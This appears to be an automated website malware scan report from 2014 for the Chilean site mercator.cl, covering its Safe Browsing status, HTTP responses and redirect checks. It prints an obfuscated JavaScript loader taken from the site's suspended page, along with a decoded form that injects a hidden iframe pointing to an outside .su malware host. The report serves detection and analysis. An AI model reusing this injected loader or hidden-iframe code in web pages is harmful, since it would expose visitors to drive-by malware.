Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mercator.cl
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mercator.cl/ | HTTP/1.1 302 Found Connection: close Date: Mon, 22 Dec 2014 22:51:26 GMT Location: http://mercator.cl/cgi-sys/suspendedpage.cgi Server: Apache Content-Length: 228 Content-Type: text/html; charset=iso-8859-1 | clean |
http://mercator.cl/cgi-sys/suspendedpage.cgi | 200 OK Content-Length: 7397 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
try{q=document.createElement("u");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'o'+'m'+'Ch';f+='arC';}try{begbe=prototype;}catch(b43gds){zz='zv'.substr(123-122)+zz;ss=[];f+=(h)?'ode':"";w=this;e=w[f.substr(11)+zz];n=[-2.75,-2.75,21.25,20.5,3,5,20,22.75,19.75,24.25,22.25,20.25,22.5,24,6.5,20.75,20.25,24,12.25,22,20.25,22.25,20.25,22.5,24,23.75,11.5,25.25,16,19.25,20.75,14.5,19.25,22.25,20.25,5,4.75,19.5,22.75,20,25.25,4.75,5.25,17.75,7,18.25,5.25,25.75,-1.75,-2.75,-2.75,-2.75,21.25,2
Decoded script:
if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://jahdivideoners.su/main.php?page=4d81d4c54d71b36c' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://jahdivideoners.su/main.php?page=4d81d4c54d71b36c');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.s
<iframe src='http://jahdivideoners.su/main.php?page=4d81d4c54d71b36c' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>
Antivirus reports:
http://mercator.cl/test404page.js | HTTP/1.1 302 Found Connection: close Date: Mon, 22 Dec 2014 22:51:28 GMT Location: http://mercator.cl/cgi-sys/suspendedpage.cgi Server: Apache Content-Length: 228 Content-Type: text/html; charset=iso-8859-1 | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mercator.cl
Result:
HTTP/1.1 302 Found
Connection: close
Date: Mon, 22 Dec 2014 22:51:26 GMT
Location: http://mercator.cl/cgi-sys/suspendedpage.cgi
Server: Apache
Content-Length: 228
Content-Type: text/html; charset=iso-8859-1
...228 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mercator.cl
Referer: http://www.google.com/search?q=mercator.cl
Result:
The result is similar to the first query. There are no suspicious redirects found.